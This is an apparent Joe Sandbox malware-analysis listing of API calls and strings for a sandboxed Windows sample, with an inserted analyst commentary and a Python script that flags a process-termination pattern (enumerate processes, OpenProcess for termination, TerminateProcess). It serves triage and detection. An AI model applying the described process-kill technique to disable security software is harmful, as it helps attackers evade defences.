• API String ID: 4194297153-14809454
• Opcode ID: e732e200ad92831dadb29540a70a8951980f0edd125e3e9ef38a10069e16a69d
• Instruction ID: 91fd2d042137ba00c711baf986f55f56e76b4ec00e78a5804335d950cf0a9cab
• Opcode Fuzzy Hash: e732e200ad92831dadb29540a70a8951980f0edd125e3e9ef38a10069e16a69d
• Instruction Fuzzy Hash: 63318535A00209DFC712DB68C845FEEBBB8FF49320F148166E509DB291DB759E41CB51
APIs
  • Part of subcall function 00317DE1: _memmove.LIBCMT ref: 00317E22
  • Part of subcall function 0036AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0036AABC
• SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00369014
• GetDlgCtrlID.USER32 ref: 0036901F
• GetParent.USER32 ref: 0036903B
• SendMessageW.USER32(00000000,?,00000111,?), ref: 0036903E
• GetDlgCtrlID.USER32(?), ref: 00369047
• GetParent.USER32(?), ref: 00369063
• SendMessageW.USER32(00000000,?,?,00000111), ref: 00369066
Similarity
• API ID: MessageSend$CtrlParent$ClassName_memmove
• String ID: ComboBox$ListBox
• API String ID: 1536045017-1403004172
• Opcode ID: 85189faa6cf022618514dc879e3354785f5006f8a9038c52a255784d4bcaf31a
• Instruction ID: 4614aa5ff9e02ca008ded41489f6cfe3c7a1f733c641d4c25042a847c5c65998
• Opcode Fuzzy Hash: 85189faa6cf022618514dc879e3354785f5006f8a9038c52a255784d4bcaf31a
• Instruction Fuzzy Hash: 6E21C875A00208BFDF06ABA0CC85EFEBB7DEF49310F10411AF9619B2A5DB765855DB20
APIs
  • Part of subcall function 00317DE1: _memmove.LIBCMT ref: 00317E22
  • Part of subcall function 0036AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0036AABC
• SendMessageW.USER32(?,00000186,00000002,00000000), ref: 003690FD
• GetDlgCtrlID.USER32 ref: 00369108
• GetParent.USER32 ref: 00369124
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00369127
• GetDlgCtrlID.USER32(?), ref: 00369130
• GetParent.USER32(?), ref: 0036914C
• SendMessageW.USER32(00000000,?,?,00000111), ref: 0036914F
Similarity
• API ID: MessageSend$CtrlParent$ClassName_memmove
• String ID: ComboBox$ListBox
• API String ID: 1536045017-1403004172
APIs
• GetParent.USER32 ref: 0036916F
• GetClassNameW.USER32(00000000,?,00000100), ref: 00369184
• _wcscmp.LIBCMT ref: 00369196
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00369211
Similarity
• API ID: ClassMessageNameParentSend_wcscmp
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 1704125052-3381328864
APIs
• SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00377A6C
Similarity
• API ID: ArraySafeVartype
• String ID:
• API String ID: 1725837607-0
APIs
• GetCurrentThreadId.KERNEL32 ref: 003711F0
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,00370268,?,00000001), ref: 00371204
• GetWindowThreadProcessId.USER32(00000000), ref: 0037120B
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00370268,?,00000001), ref: 0037121A
• GetWindowThreadProcessId.USER32(?,00000000), ref: 0037122C
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00370268,?,00000001), ref: 00371245
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00370268,?,00000001), ref: 00371257
• AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00370268,?,00000001), ref: 0037129C
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00370268,?,00000001), ref: 003712B1
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00370268,?,00000001), ref: 003712BC
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0031FAA6
• OleUninitialize.OLE32(?,00000000), ref: 0031FB45
• UnregisterHotKey.USER32(?), ref: 0031FC9C
• DestroyWindow.USER32(?), ref: 003545D6
• FreeLibrary.KERNEL32(?), ref: 0035463B
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 00354668
Similarity
• API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
• String ID: close all
• API String ID: 469580280-3243417748
Similarity
• API ID: Variant$ClearInit$_memset
• String ID: ,,:$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
• API String ID: 2862541840-3363735775
APIs
• EnumChildWindows.USER32(?,0036A439), ref: 0036A377
Similarity
• API ID: ChildEnumWindows
• String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
• API String ID: 3555792229-1603158881
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 00312EAE
  • Part of subcall function 00311DB3: GetClientRect.USER32(?,?), ref: 00311DDC
  • Part of subcall function 00311DB3: GetWindowRect.USER32(?,?), ref: 00311E1D
  • Part of subcall function 00311DB3: ScreenToClient.USER32(?,?), ref: 00311E45
• GetDC.USER32 ref: 0034CD32
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0034CD45
• SelectObject.GDI32(00000000,00000000), ref: 0034CD53
• SelectObject.GDI32(00000000,00000000), ref: 0034CD68
• ReleaseDC.USER32(?,00000000), ref: 0034CD70
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0034CDFB
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: U
• API String ID: 4009187628-3372436214
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00381A50
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00381A7C
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00381ABE
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00381AD3
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00381AE0
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00381B10
• InternetCloseHandle.WININET(00000000), ref: 00381B57
  • Part of subcall function 00382483: GetLastError.KERNEL32(?,?,00381817,00000000,00000000,00000001), ref: 00382498
  • Part of subcall function 00382483: SetEvent.KERNEL32(?,?,00381817,00000000,00000000,00000001), ref: 003824AD
Similarity
• API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
• String ID:
• API String ID: 2603140658-3916222277
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,?,0039F910), ref: 00388D28
• FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0039F910), ref: 00388D5C
• QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00388ED6
• SysFreeString.OLEAUT32(?), ref: 00388F00
                                                                          Similarity
                                                                          • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                          • String ID:
                                                                          • API String ID: 560350794-0
                                                                          • Opcode ID: c4b6da5966bda2b1460fbc100c2447120c278974f2e29126e24b188c7c1f3517
                                                                          • Instruction ID: 9805b025240b348a792c0bc29abf7e27f5e4090f0902647273225b560d770301
                                                                          • Opcode Fuzzy Hash: c4b6da5966bda2b1460fbc100c2447120c278974f2e29126e24b188c7c1f3517
                                                                          • Instruction Fuzzy Hash: 28F12871A00209EFCF15EF94C884EAEB7B9FF49314F158499F905AB251DB31AE46CB50
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 0038F6B5
                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0038F848
                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0038F86C
                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0038F8AC
                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0038F8CE
                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0038FA4A
                                                                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0038FA7C
                                                                          • CloseHandle.KERNEL32(?), ref: 0038FAAB
                                                                          • CloseHandle.KERNEL32(?), ref: 0038FB22
                                                                          Similarity
                                                                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                          • String ID:
                                                                          • API String ID: 4090791747-0
                                                                          • Opcode ID: 12e4565891228a7943f1a34bae2d2facdd14b18f1aaff4ac4fe763019bb11c96
                                                                          • Instruction ID: 7f8c21a0ab1f633d2bb75ed1a4e84cfbd0ce7db29dcf9d06cc5bb0d1b4f27072
                                                                          • Opcode Fuzzy Hash: 12e4565891228a7943f1a34bae2d2facdd14b18f1aaff4ac4fe763019bb11c96
                                                                          • Instruction Fuzzy Hash: C5E190316043009FDB16EF24C891B6ABBE5EF89354F1485ADF8999F2A2CB31DC45CB52
                                                                          APIs
                                                                            • Part of subcall function 0037466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00373697,?), ref: 0037468B
                                                                            • Part of subcall function 0037466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00373697,?), ref: 003746A4
                                                                            • Part of subcall function 00374A31: GetFileAttributesW.KERNEL32(?,0037370B), ref: 00374A32
                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00374D40
                                                                          • _wcscmp.LIBCMT ref: 00374D5A
                                                                          • MoveFileW.KERNEL32(?,?), ref: 00374D75
                                                                          Similarity
                                                                          • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                          • String ID:
                                                                          • API String ID: 793581249-0
                                                                          • Opcode ID: 6217b64fcfa3b9370de213c63ab1e8cd5a590208bedda21d302f53131eacc3e7
                                                                          • Instruction ID: 609c76f1cb7233d84d8c4a17662c541326cf06b6e7ddd3d2f37d0c4e397c0f7c
                                                                          • Opcode Fuzzy Hash: 6217b64fcfa3b9370de213c63ab1e8cd5a590208bedda21d302f53131eacc3e7
                                                                          • Instruction Fuzzy Hash: 75513FB20083459BC736DBA0D8819DFB3ECAF85350F00492EF689D7152EF35A688C766
                                                                          APIs
                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 003986FF
                                                                          Similarity
                                                                          • API ID: InvalidateRect
                                                                          • String ID:
                                                                          • API String ID: 634782764-0
                                                                          • Opcode ID: a85bf430dfc72adbeb8a67d231e019104c6dffae4139261cfeba68cad1a9f90e
                                                                          • Instruction ID: cfd01353ee5fab84d65b63c02343e969b3e0fd977464fc95ae0b26f79cb400ff
                                                                          • Opcode Fuzzy Hash: a85bf430dfc72adbeb8a67d231e019104c6dffae4139261cfeba68cad1a9f90e
                                                                          • Instruction Fuzzy Hash: 9751C330604244BFEF27AF68DC85FAD7B68EB46350F600116FA55EA5A1CF72E990CB50
                                                                          APIs
                                                                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0034C2F7
                                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0034C319
                                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0034C331
                                                                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0034C34F
                                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0034C370
                                                                          • DestroyIcon.USER32(00000000), ref: 0034C37F
                                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0034C39C
                                                                          • DestroyIcon.USER32(?), ref: 0034C3AB
                                                                            • Part of subcall function 0039A4AF: DeleteObject.GDI32(00000000), ref: 0039A4E8
                                                                          Similarity
                                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                          • String ID:
                                                                          • API String ID: 2819616528-0
                                                                          • Opcode ID: e56e74d60b87052b746308814e1cead54b82a2a51dd42eabf4f8509b86d43a1c
                                                                          • Instruction ID: 74373263a0ac970f8396ec445b93fc422fff3fdbc29abc7f68f3ae57344b408d
                                                                          • Opcode Fuzzy Hash: e56e74d60b87052b746308814e1cead54b82a2a51dd42eabf4f8509b86d43a1c
                                                                          • Instruction Fuzzy Hash: 45517A74610209AFDB2ADF64DC45FAB3BF9EB08310F108529F902DB290D7B0ACA0DB50
                                                                          APIs
                                                                            • Part of subcall function 0036A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0036A84C
                                                                            • Part of subcall function 0036A82C: GetCurrentThreadId.KERNEL32 ref: 0036A853
                                                                            • Part of subcall function 0036A82C: AttachThreadInput.USER32(00000000,?,00369683,?,00000001), ref: 0036A85A
                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0036968E
                                                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 003696AB
                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 003696AE
                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 003696B7
                                                                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 003696D5
                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 003696D8
                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 003696E1
                                                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 003696F8
                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 003696FB
                                                                          Similarity
                                                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                          • String ID:
                                                                          • API String ID: 2014098862-0
                                                                          • Opcode ID: 5b96c9762e9083c7c71668241dcc85eeae28f0dd4dc1a629fbafc0f119662bed
                                                                          • Instruction ID: e4bd85d428f1c005d35caef12591f993712b890703053d92d219d8794ebba43b
                                                                          • Opcode Fuzzy Hash: 5b96c9762e9083c7c71668241dcc85eeae28f0dd4dc1a629fbafc0f119662bed
                                                                          • Instruction Fuzzy Hash: 4711CEB1910618BEF7126B64DC89F6A7E2DEB4C760F100426F244AB0A0C9F36C509AE8
                                                                          APIs
                                                                          • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0036853C,00000B00,?,?), ref: 0036892A
                                                                          • HeapAlloc.KERNEL32(00000000,?,0036853C,00000B00,?,?), ref: 00368931
                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0036853C,00000B00,?,?), ref: 00368946
                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,0036853C,00000B00,?,?), ref: 0036894E
                                                                          • DuplicateHandle.KERNEL32(00000000,?,0036853C,00000B00,?,?), ref: 00368951
                                                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0036853C,00000B00,?,?), ref: 00368961
                                                                          • GetCurrentProcess.KERNEL32(0036853C,00000000,?,0036853C,00000B00,?,?), ref: 00368969
                                                                          • DuplicateHandle.KERNEL32(00000000,?,0036853C,00000B00,?,?), ref: 0036896C
                                                                          • CreateThread.KERNEL32(00000000,00000000,00368992,00000000,00000000,00000000), ref: 00368986
                                                                          Similarity
                                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                          • String ID:
                                                                          • API String ID: 1957940570-0
                                                                          • Opcode ID: 6bfecbd91c86077a9ec17e0ef7eddfeb4baa5653e99ce661322898f67371aabb
                                                                          • Instruction ID: 2c44808c3e8e5d3475cdd434c75d7813ff120ba4c5e977b41783c948aca604a6
                                                                          • Opcode Fuzzy Hash: 6bfecbd91c86077a9ec17e0ef7eddfeb4baa5653e99ce661322898f67371aabb
                                                                          • Instruction Fuzzy Hash: 0601BBB5240308FFEB11ABA5DC4DF6B3BACEB89711F508422FA05DB1A1CA719800CB64
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                                          • API String ID: 0-572801152
                                                                          • Opcode ID: 22943352b676bb36a5ed94a0eb7edf8ea16324bcbae35f80e5cf35d9e8deb331
                                                                          • Instruction ID: 6ec24a8a5c50e54ffc1589fe7766e46ab72ea2080bf1a2c4335be49b67dbdf3f
                                                                          • Opcode Fuzzy Hash: 22943352b676bb36a5ed94a0eb7edf8ea16324bcbae35f80e5cf35d9e8deb331
                                                                          • Instruction Fuzzy Hash: E0C17571A003199FDF11EF58D884BBEB7F9FB48314F1984AAE905AB240E771AD45CB50
                                                                          APIs
                                                                            • Part of subcall function 0036710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00367044,80070057,?,?,?,00367455), ref: 00367127
                                                                            • Part of subcall function 0036710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00367044,80070057,?,?), ref: 00367142
                                                                            • Part of subcall function 0036710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00367044,80070057,?,?), ref: 00367150
                                                                            • Part of subcall function 0036710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00367044,80070057,?), ref: 00367160
                                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00389806
                                                                          • _memset.LIBCMT ref: 00389813
                                                                          • _memset.LIBCMT ref: 00389956
                                                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00389982
                                                                          • CoTaskMemFree.OLE32(?), ref: 0038998D
                                                                          Strings
                                                                          • NULL Pointer assignment, xrefs: 003899DB
                                                                          Similarity
                                                                          • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                          • String ID: NULL Pointer assignment
                                                                          • API String ID: 1300414916-2785691316
                                                                          • Opcode ID: 88bbcd33e07cf0a87bb2f7c0b698c1a9138a1bd2fc552f76cad1a34e41dea7f9
                                                                          • Instruction ID: e28a0b754fd6d54fc8e8391e5711dd962a64c2e28a6b204c7fcc2ffa75bd91f7
                                                                          • Opcode Fuzzy Hash: 88bbcd33e07cf0a87bb2f7c0b698c1a9138a1bd2fc552f76cad1a34e41dea7f9
                                                                          • Instruction Fuzzy Hash: 6E912A71D00229EBDB16EFA5DC85EEEBBB9AF08310F10415AF419AB251DB715A44CFA0
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00396E24
                                                                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 00396E38
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00396E52
                                                                          • _wcscat.LIBCMT ref: 00396EAD
                                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 00396EC4
                                                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00396EF2
                                                                          Similarity
                                                                          • API ID: MessageSend$Window_wcscat
                                                                          • String ID: SysListView32
                                                                          • API String ID: 307300125-78025650
                                                                          • Opcode ID: 30a794d477479ca07637582235b82ad4d474e7a73c4a72e85f1ef2e5621bf042
                                                                          • Instruction ID: 6bcfbb57412bbaf310955d224011307811069fa4fa2e1b9514ca9f7e66119ee9
                                                                          • Opcode Fuzzy Hash: 30a794d477479ca07637582235b82ad4d474e7a73c4a72e85f1ef2e5621bf042
                                                                          • Instruction Fuzzy Hash: BB41A271A00348AFEF229F64CC86BEEB7E8EF08350F11442AF555EB191D6729D848B60
APIs
  • Part of subcall function 00373C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00373C7A
  • Part of subcall function 00373C55: Process32FirstW.KERNEL32(00000000,?), ref: 00373C88
  • Part of subcall function 00373C55: CloseHandle.KERNEL32(00000000), ref: 00373D52
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0038E9A4
• GetLastError.KERNEL32 ref: 0038E9B7
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0038E9E6
• TerminateProcess.KERNEL32(00000000,00000000), ref: 0038EA63
• GetLastError.KERNEL32(00000000), ref: 0038EA6E
• CloseHandle.KERNEL32(00000000), ref: 0038EAA3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• API String ID: 2533919879-2896544425
• Opcode ID: 66205553e83bb5f929b7af3b1a524730450f53302c126fd69d3318afb97b1c6c
• Instruction ID: d2b7da3755dd6539c9e07e56d04022fb361e6a42e86f430b855d8119555bdc01
• Opcode Fuzzy Hash: 66205553e83bb5f929b7af3b1a524730450f53302c126fd69d3318afb97b1c6c
• Instruction Fuzzy Hash: C541CD312003009FDB1AEF24CCA6FAEB7A9AF45710F148459F9069F2D2CB79E844CB95
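The record above is the one a triage analyst should stop at: a Toolhelp32 process enumeration in a subcall, then OpenProcess with desired access 00000001 (PROCESS_TERMINATE in winnt.h), then TerminateProcess, next to the string SeDebugPrivilege. Read together with the AV process-name strings the Signatures list reports, that is the process-kill primitive worth confirming in the binary. As an added example, not Joe Sandbox code and nothing taken from the analysed sample, the following Python parses function records in this report format, decodes the OpenProcess access mask, and flags the enumerate/open-for-terminate/terminate sequence. The two sample records are copied from this page and embedded as constructed input; the access-right table is the subset of winnt.h values useful for triage.

```python
"""Parse the "APIs" lines of a Joe Sandbox function record and flag the
process-kill call pattern (enumerate processes, OpenProcess with
PROCESS_TERMINATE, TerminateProcess at a later address).

Added example for reading this report; it is not Joe Sandbox code and
nothing here comes from the analysed sample. The SAMPLE_* strings are
copied from the records on this page and embedded as constructed input."""
import re

# Process access rights from winnt.h, used to decode OpenProcess's first
# argument (dwDesiredAccess). Only bits relevant to triage are listed.
PROCESS_ACCESS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}

ENUM_APIS = {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW",
             "Process32First", "Process32Next"}

# One record line, e.g.
#   • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0038E9A4
#   • GetLastError.KERNEL32 ref: 0038E9B7
#   • Part of subcall function 00373C55: CloseHandle.KERNEL32(00000000), ref: 00373D52
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z0-9_:@]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)


def parse_api_lines(text):
    """Return the API calls of one record in document order."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # headers such as "APIs"/"Strings" and non-API lines
        raw = m["args"]
        calls.append({
            "api": m["api"],
            "module": m["module"],
            "args": [a.strip() for a in raw.split(",")] if raw else [],
            "ref": int(m["ref"], 16),
            "subcall_of": m["caller"],   # None for the function's own calls
        })
    return calls


def decode_access(arg):
    """Name the PROCESS_* rights set in an OpenProcess access mask.
    Unresolved arguments ('?') decode to an empty list."""
    try:
        mask = int(arg, 16)
    except ValueError:
        return []
    return [name for bit, name in sorted(PROCESS_ACCESS.items()) if mask & bit]


def analyze_record(text):
    """Summarise one record: does it enumerate processes, open any with
    PROCESS_TERMINATE, and then call TerminateProcess at a later address?"""
    calls = parse_api_lines(text)
    opens = [c for c in calls if c["api"] == "OpenProcess" and c["args"]
             and "PROCESS_TERMINATE" in decode_access(c["args"][0])]
    kills = [c for c in calls if c["api"] == "TerminateProcess"]
    return {
        "api_count": len(calls),
        "enumerates_processes": any(c["api"] in ENUM_APIS for c in calls),
        "terminate_opens": [f"{c['ref']:08X}" for c in opens],
        "terminate_calls": [f"{c['ref']:08X}" for c in kills],
        # the handle is opened for termination before TerminateProcess runs
        "kill_pattern": any(k["ref"] > o["ref"] for o in opens for k in kills),
    }


# Constructed input: the record for the function at 0038E9A4..0038EAA3 above.
SAMPLE_KILL = """APIs
  • Part of subcall function 00373C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00373C7A
  • Part of subcall function 00373C55: Process32FirstW.KERNEL32(00000000,?), ref: 00373C88
  • Part of subcall function 00373C55: CloseHandle.KERNEL32(00000000), ref: 00373D52
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0038E9A4
• GetLastError.KERNEL32 ref: 0038E9B7
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0038E9E6
• TerminateProcess.KERNEL32(00000000,00000000), ref: 0038EA63
• GetLastError.KERNEL32(00000000), ref: 0038EA6E
• CloseHandle.KERNEL32(00000000), ref: 0038EAA3
Strings
"""

# Constructed input: the list-view record above, which must not match.
SAMPLE_GUI = """APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00396E24
• _wcscat.LIBCMT ref: 00396EAD
• SendMessageW.USER32(?,00001061,?,0000000F), ref: 00396EF2
"""

if __name__ == "__main__":
    for name, rec in (("kill", SAMPLE_KILL), ("gui", SAMPLE_GUI)):
        print(name, analyze_record(rec))
```

The ordering check on the ref addresses matters: a record that merely imports TerminateProcess somewhere before an OpenProcess is not the same primitive, and an OpenProcess whose access argument the sandbox could not resolve ("?") is left unflagged rather than guessed.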
APIs
• LoadIconW.USER32(00000000,00007F03), ref: 00373033
Strings
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
Similarity
• API ID: IconLoad
• String ID: blank$info$question$stop$warning
• API String ID: 2457776203-404129466
• Opcode ID: d260bf3a7c4d215ad375339a73ed06c22ad66497e678983a653867b9e1bd02e1
• Instruction ID: 365712dfe73410cb4e1152475826372efea8586cf1f8c13d4daaf93ad2e86292
• Opcode Fuzzy Hash: d260bf3a7c4d215ad375339a73ed06c22ad66497e678983a653867b9e1bd02e1
• Instruction Fuzzy Hash: 1B112B31348346BED7279B54DC82DAB779C9F19360F11402EF909A6181DBB95F4066A1
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00374312
• LoadStringW.USER32(00000000), ref: 00374319
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0037432F
• LoadStringW.USER32(00000000), ref: 00374336
• _wprintf.LIBCMT ref: 0037435C
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 0037437A
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 00374357
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
Similarity
• API ID: HandleLoadModuleString$Message_wprintf
• String ID: %s (%d) : ==> %s: %s %s
• API String ID: 3648134473-3128320259
• Opcode ID: df3d41629ae7926411174e4e5147905df9efbb327b01b8daf460b8fb62ae4cb5
• Instruction ID: db29e7e5353a9bd8e2e2db4cddd2e26454e409467f6cfbc852aabd29e7a55f2f
• Opcode Fuzzy Hash: df3d41629ae7926411174e4e5147905df9efbb327b01b8daf460b8fb62ae4cb5
• Instruction Fuzzy Hash: E7018FF6900208BFE712ABA0DD89EF6736CDB08301F0004A2B709E6011EA355E944B70
APIs
  • Part of subcall function 00312612: GetWindowLongW.USER32(?,000000EB), ref: 00312623
• GetSystemMetrics.USER32(0000000F), ref: 0039D47C
• GetSystemMetrics.USER32(0000000F), ref: 0039D49C
• MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0039D6D7
• SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0039D6F5
• SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0039D716
• ShowWindow.USER32(00000003,00000000), ref: 0039D735
• InvalidateRect.USER32(?,00000000,00000001), ref: 0039D75A
• DefDlgProcW.USER32(?,00000005,?,?), ref: 0039D77D
Memory Dump Source
